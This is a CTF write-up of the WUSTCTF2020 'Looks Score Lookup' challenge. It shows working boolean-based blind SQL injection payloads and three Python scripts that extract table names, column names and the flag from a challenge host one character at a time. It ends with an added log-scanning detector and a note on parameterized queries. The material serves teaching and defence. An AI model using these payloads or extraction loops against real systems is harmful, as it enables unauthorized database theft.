WUSTCTF2020 颜值成绩查询 (Looks Score Lookup)

The challenge is described as a "lookup", so the natural first guess is SQL injection.
Entering 1, 2, 3 or 4 in the search box changes the page; any other input does not.
Quote characters such as ' and " produce no visible error or difference in the response.

So try boolean-based blind injection instead, using the page difference as the oracle.

`if(length(database())>1,1,0)` gives a response (screenshot 133.PNG).

`if(length(database())>3,1,0)` gives no response (screenshot 134.PNG), so the database name is 2 or 3 characters long and the condition is evaluated.

Dumping the table names:

```python
import requests

s = requests.session()
flag = ''
for i in range(1, 50):                  # position of the character being recovered
    for j in '{qwertyuiopasdfghjklzxcvbnm_@#$%^&*()_+=-0123456789,./?|}':
        # A correct guess makes stunum evaluate to 1 (page contains "Hi admin"), a wrong one to 2
        url = "http://3690b471-adc4-4ce3-9854-38ef7b05bdef.node4.buuoj.cn/?stunum=if((select(substr(group_concat(table_name),{},1))from/**/information_schema.tables/**/where/**/table_schema=database())='{}',1,2)".format(i, j)
        c = s.get(url, timeout=3)
        # print(c.text)
        if 'Hi admin' in c.text:
            flag += j
            print(flag)
            break
```

Dumping the column names:

```python
import requests

s = requests.session()
flag = ''
for i in range(1, 50):                  # position of the character being recovered
    for j in '{qwertyuiopasdfghjklzxcvbnm_@#$%^&*()_=-0123456789,./?|}':
        # Same oracle as before, now reading column_name from information_schema.columns
        url = "http://3690b471-adc4-4ce3-9854-38ef7b05bdef.node4.buuoj.cn/?stunum=if((select(substr(group_concat(column_name),{},1))from/**/information_schema.columns/**/where/**/table_schema=database())='{}',1,2)".format(i, j)
        c = s.get(url, timeout=3)
        # print(c.text)
        if 'Hi admin' in c.text:
            flag += j
            print(flag)
            break
```

Dumping the value from the flag table:

```python
import requests

s = requests.session()
flag = ''
for i in range(1, 50):                  # position of the character being recovered
    for j in '{qwertyuiopasdfghjklzxcvbnm_@#$%^&*()_=-0123456789,./?|}':
        # Same oracle, now reading the value column of the flag table found above
        url = "http://3690b471-adc4-4ce3-9854-38ef7b05bdef.node4.buuoj.cn/?stunum=if((select(substr(group_concat(value),{},1))from/**/flag)='{}',1,2)".format(i, j)
        c = s.get(url, timeout=3)
        # print(c.text)
        if 'Hi admin' in c.text:
            flag += j
            print(flag)
            break
```
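Seen from the server side, a loop like the three scripts above leaves a very recognisable trail: hundreds of requests from one client whose `stunum` parameter contains `if(`, `substr(`, `group_concat(` or `information_schema`, with `/**/` standing in for spaces. The following detector is an added example, not part of the write-up; it parses constructed combined-format access-log lines (the sample lines and the signature names are assumptions) and flags requests whose `stunum` carries those primitives.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not captured from the challenge server).
# The first two mirror the probes in the write-up; the third is an ordinary lookup.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?stunum=if(length(database())%3E1,1,0) HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?stunum=if((select(substr(group_concat(table_name),1,1))from/**/information_schema.tables/**/where/**/table_schema=database())='f',1,2) HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?stunum=2 HTTP/1.1" 200 498
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d+')

# Primitives the write-up chains together: a conditional, per-character extraction and
# schema enumeration. Keywords are matched after /**/ comment-whitespace is collapsed.
SIGNATURES = [
    ("if()", re.compile(r'\bif\s*\(', re.I)),
    ("substr()", re.compile(r'\bsubstr(?:ing)?\s*\(', re.I)),
    ("group_concat()", re.compile(r'\bgroup_concat\s*\(', re.I)),
    ("information_schema", re.compile(r'\binformation_schema\.', re.I)),
    ("select/from/where", re.compile(r'\b(?:select|from|where)\b', re.I)),
]

def probe_signatures(target, param="stunum"):
    """Return the signature names matched by one query parameter of a request target."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, [])
    hits = []
    for raw in values:  # parse_qs has already URL-decoded the value (%3E -> >)
        text = re.sub(r'/\*.*?\*/', ' ', raw)  # /**/ used as whitespace -> real space
        hits.extend(name for name, rx in SIGNATURES if rx.search(text))
    return hits

def scan_log(log_text):
    """Return (ip, target, hits) for each request whose stunum matches a signature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            hits = probe_signatures(m.group("target"))
            if hits:
                findings.append((m.group("ip"), m.group("target"), hits))
    return findings

def probes_per_client(findings):
    """Flagged requests per source IP: a character-by-character loop shows up as a large count."""
    return Counter(ip for ip, _, _ in findings)

for ip, target, hits in scan_log(SAMPLE_LOG):  # demo run over the constructed sample
    print(ip, hits)
```

The per-client count is the useful alerting key: a single probe can be a false positive, but dozens of flagged `stunum` values from one address within a minute is the signature of the extraction loop itself. The real fix is on the application side, binding `stunum` as a parameter instead of concatenating it into the query.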